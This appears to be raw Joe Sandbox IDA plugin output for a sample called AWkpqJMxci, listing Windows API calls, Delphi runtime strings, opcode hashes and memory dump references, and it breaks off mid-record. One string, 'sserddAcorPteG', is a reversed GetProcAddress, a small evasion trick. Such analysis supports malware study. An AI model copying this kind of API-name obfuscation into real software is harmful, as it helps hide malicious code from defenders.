• GetVersionExA.KERNEL32(?,028AD106,00000000,028AD11E), ref: 0288B79A
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0288BE72,00000000,0288C08B,?,?,00000000,00000000), ref: 0288A823
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
                                                                            Similarity
                                                                            • API ID: LocalTime
                                                                            • String ID:
                                                                            • API String ID: 481472006-0
                                                                            • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                            • Instruction ID: 13d2adc10819b1d9dcacd84af2c18f0bd3e833ffc5e2c502ac0c402047062beb
                                                                            • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                            • Instruction Fuzzy Hash: 2EA01248404870418540731C0C0253430445C10A20FC4874068F8802D1FA1D11208093
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f3684cc77bf0a9ad2e346a687dae82cc82e2fe3b3514fb91ce25245bce463e1e
                                                                            • Instruction ID: 7d8e2265fc2be6973318de95e7942e0fe9bbd532b455c9647715445617b765ad
                                                                            • Opcode Fuzzy Hash: f3684cc77bf0a9ad2e346a687dae82cc82e2fe3b3514fb91ce25245bce463e1e
                                                                            • Instruction Fuzzy Hash: 28C15E2994E3C85FD313677848F96A93FB18F4720472A99EAC0C4CF5B3C909581BDB66
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dcbf099dcd499ecc8eb103b47f0af67ba2d2871f684cf17d401e25ae39527aec
                                                                            • Instruction ID: b5635504b8e76fa83eaa88211ff7b10ab655ef37c6efbe9f45168055c1eefb4f
                                                                            • Opcode Fuzzy Hash: dcbf099dcd499ecc8eb103b47f0af67ba2d2871f684cf17d401e25ae39527aec
                                                                            • Instruction Fuzzy Hash: CD51045941E7C28FD7434F7C98B42A1BFB19D2B12430E19EAC8D4CF563D609589BEB22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                            • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                            • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                            • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0288D29D
                                                                              • Part of subcall function 0288D268: GetProcAddress.KERNEL32(00000000), ref: 0288D281
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                            • API String ID: 1646373207-1918263038
                                                                            • Opcode ID: e785cbbda4c387c6692b7fc5325f9be7eddeb90afeba22408a809920e4b38d60
                                                                            • Instruction ID: 11956f821361f23009a4f014bc9dfaa3ab2f0e384531cf11d28dca09dd77e21d
                                                                            • Opcode Fuzzy Hash: e785cbbda4c387c6692b7fc5325f9be7eddeb90afeba22408a809920e4b38d60
                                                                            • Instruction Fuzzy Hash: FF417F6D98D30D5A52187ABD7440877B7DED648B313A0451BF604CB7C8EAB0FC598B3A
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02896EDE
                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02896EEF
                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02896EFF
                                                                            • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02896F0F
                                                                            • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02896F1F
                                                                            • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02896F2F
                                                                            • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02896F3F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                            • API String ID: 667068680-2233174745
                                                                            • Opcode ID: 5d55ddcd808848005fed7b2b8b79882c4aac13393257507d7e8376109c063425
                                                                            • Instruction ID: 1a9e1dc073941345cdceab61da05dee37c8202e58d335281f7ea24daf5204d6f
                                                                            • Opcode Fuzzy Hash: 5d55ddcd808848005fed7b2b8b79882c4aac13393257507d7e8376109c063425
                                                                            • Instruction Fuzzy Hash: 3DF042FCA983F0ADBF50FB745C85926275DAD306443041C25B903D5E83FA796C248F11
                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028828CE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                            • API String ID: 2030045667-32948583
                                                                            • Opcode ID: 7ab269f23de9e67a25e2fcb119b345cbaaafd6dbdf7384dab4cc256abf257f79
                                                                            • Instruction ID: e97825e280d444e1e3fd466e8d49246a5dc902446dec9981515b17c3c3e16587
                                                                            • Opcode Fuzzy Hash: 7ab269f23de9e67a25e2fcb119b345cbaaafd6dbdf7384dab4cc256abf257f79
                                                                            • Instruction Fuzzy Hash: 64A1043CA042E88FDF21BA2CCC80B99B6E5EB09754F1401E5DD4DEB28ACB759985CF51
                                                                            Strings
                                                                            • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02882849
                                                                            • The unexpected small block leaks are:, xrefs: 02882707
                                                                            • , xrefs: 02882814
                                                                            • bytes: , xrefs: 0288275D
                                                                            • 7, xrefs: 028826A1
                                                                            • Unexpected Memory Leak, xrefs: 028828C0
                                                                            • An unexpected memory leak has occurred. , xrefs: 02882690
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                            • API String ID: 0-2723507874
                                                                            • Opcode ID: 043c44473ef34fd4d1937f48d6d6fe8a85850c0187c614e614474a04511ab606
                                                                            • Instruction ID: e70123f424f91eed4932a4e6e13b8b52e01de48816b3e06628a256447b7bf1a5
                                                                            • Opcode Fuzzy Hash: 043c44473ef34fd4d1937f48d6d6fe8a85850c0187c614e614474a04511ab606
                                                                            • Instruction Fuzzy Hash: 0E71C23CA042D88FDF21BA2CCC84B99BAE5EB09754F1001E5D94DDB28ACB754985CF52
                                                                            APIs
                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0289B000
                                                                            • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0289B017
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0289B02F
                                                                            • IsBadReadPtr.KERNEL32(?,00000004), ref: 0289B0AB
                                                                            • IsBadReadPtr.KERNEL32(?,00000002), ref: 0289B0B7
                                                                            • IsBadReadPtr.KERNEL32(?,00000014), ref: 0289B0CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Read$HandleLibraryLoadModule
                                                                            • String ID: KernelBase$LoadLibraryExA
                                                                            • API String ID: 2872661360-113032527
                                                                            • Opcode ID: f2990bb297d5db9de70eee9daf36983a40f4e0ebb3a6b66469373cece0997804
                                                                            • Instruction ID: cba83e5dca984180b801f576009dcf91d64092fd4aaf6b8d94924218ce5783e3
                                                                            • Opcode Fuzzy Hash: f2990bb297d5db9de70eee9daf36983a40f4e0ebb3a6b66469373cece0997804
                                                                            • Instruction Fuzzy Hash: 2A31637DA40309BBDF20DBA8DC85F5D77A8BF05368F084514EA28EB2C1D330A950CB61
                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(00000000,0288C08B,?,?,00000000,00000000), ref: 0288BDF6
                                                                              • Part of subcall function 0288A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0288A7E2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                            • API String ID: 4232894706-2493093252
                                                                            • Opcode ID: 3fcc652cbce3393e90e633b9096a2f85dcf7e8327ebfa8a2990e958695645cca
                                                                            • Instruction ID: bb9e822509518f76f77376ef5b4d725e732d094ed3d10cd154bf43cc60e2b690
                                                                            • Opcode Fuzzy Hash: 3fcc652cbce3393e90e633b9096a2f85dcf7e8327ebfa8a2990e958695645cca
                                                                            • Instruction Fuzzy Hash: 8B61753CB002499BDB08F7A8D89069F77FBDB88300F508436E501DB789DA39D9159F66
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02884423,?,?,029067C8,?,?,028AE7A8,028865B1,028AD30D), ref: 02884395
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02884423,?,?,029067C8,?,?,028AE7A8,028865B1,028AD30D), ref: 0288439B
                                                                            • GetStdHandle.KERNEL32(000000F5,028843E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02884423,?,?,029067C8), ref: 028843B0
                                                                            • WriteFile.KERNEL32(00000000,000000F5,028843E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02884423,?,?), ref: 028843B6
                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028843D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error at 00000000
                                                                            • API String ID: 1570097196-2970929446
                                                                            • Opcode ID: 1232f35799e2e61d41e7d08581943122bbc74a7f3caa06e1f9d8f2ea79a33d8e
                                                                            • Instruction ID: be20680fcabfed44bb3d99841d4362040869e90334d5c55546dd8b9bb258cc7a
                                                                            • Opcode Fuzzy Hash: 1232f35799e2e61d41e7d08581943122bbc74a7f3caa06e1f9d8f2ea79a33d8e
                                                                            • Instruction Fuzzy Hash: 3AF0B46EBC834979FA20B2A87D8AF79275C5748F25F542E15B328E40C5CFA844C58B23
                                                                            APIs
                                                                              • Part of subcall function 0288AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0288AD59
                                                                              • Part of subcall function 0288AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0288AD7D
                                                                              • Part of subcall function 0288AD3C: GetModuleFileNameA.KERNEL32(02880000,?,00000105), ref: 0288AD98
                                                                              • Part of subcall function 0288AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0288AE2E
                                                                            • CharToOemA.USER32(?,?), ref: 0288AEFB
                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0288AF18
                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288AF1E
                                                                            • GetStdHandle.KERNEL32(000000F4,0288AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288AF33
                                                                            • WriteFile.KERNEL32(00000000,000000F4,0288AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0288AF39
                                                                            • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0288AF5B
                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0288AF71
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                            • String ID:
                                                                            • API String ID: 185507032-0
                                                                            • Opcode ID: 161f23f949ca86600fdaadd8a970366d4eb2c80bf813d9febcf098cb85b0c5eb
                                                                            • Instruction ID: d640e503db1199476f3c2518be41fea464c3c93b333b430fc35c1faae97f6b88
                                                                            • Opcode Fuzzy Hash: 161f23f949ca86600fdaadd8a970366d4eb2c80bf813d9febcf098cb85b0c5eb
                                                                            • Instruction Fuzzy Hash: 561170BE548345BED200FBA8CC81F9B77EDAF44700F804A16B744D60D4EA74E9048B63
                                                                            APIs
                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0288E625
                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0288E641
                                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0288E67A
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0288E6F7
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0288E710
                                                                            • VariantCopy.OLEAUT32(?,00000000), ref: 0288E745
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                            • String ID:
                                                                            • API String ID: 351091851-0
                                                                            • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                            • Instruction ID: 7a8df0b67248fe54830233aa1dbdb91f3e93afbc2a68825b3dcfde2466a72b46
                                                                            • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                            • Instruction Fuzzy Hash: 2051D97D9016299BCB26EB98C890BD9B3BDAF49310F0045D5F609E7211DB30AF858F62
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028835BA
                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02883609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028835ED
                                                                            • RegCloseKey.ADVAPI32(?,02883610,00000000,?,00000004,00000000,02883609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02883603
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                            • API String ID: 3677997916-4173385793
                                                                            • Opcode ID: 44efcdb4152991a93bcbd57d5ee2fe348e5679478fe688f479f8b1438eb7c2c6
                                                                            • Instruction ID: 7150eff202641003fef1caeafb084d8625238f88fd09d167b11ae769ca4666f2
                                                                            • Opcode Fuzzy Hash: 44efcdb4152991a93bcbd57d5ee2fe348e5679478fe688f479f8b1438eb7c2c6
                                                                            • Instruction Fuzzy Hash: 2F01757D950218BAFB11EBD49D42BBD77ECE708B10F1009A1BA04D6680EB74A510DA5A
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                            • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: Kernel32$sserddAcorPteG
                                                                            • API String ID: 667068680-1372893251
                                                                            • Opcode ID: 5a3d710612b3a96a27b986baf8d37f2d01831cbc675eac8b470eca0c81e3dca7
                                                                            • Instruction ID: 7af2f173e872da4985c8c71501742b82d70ff9ffee849f1472b99a40463bc441
                                                                            • Opcode Fuzzy Hash: 5a3d710612b3a96a27b986baf8d37f2d01831cbc675eac8b470eca0c81e3dca7
                                                                            • Instruction Fuzzy Hash: CC014F7D644309AFEB04FBE8EC81A9EB7EEEB49B10F558460A800D7644E674B900CA25
                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(?,00000000,0288AAE7,?,?,00000000), ref: 0288AA68
                                                                              • Part of subcall function 0288A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0288A7E2
                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0288AAE7,?,?,00000000), ref: 0288AA98
                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 0288AAA3
                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0288AAE7,?,?,00000000), ref: 0288AAC1
                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 0288AACC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                            • String ID:
                                                                            • API String ID: 4102113445-0
                                                                            • Opcode ID: a26ab34030ba2f3f9e5a4196a65f430a67e9f1ae8e5f7320120bb0ea74a076cd
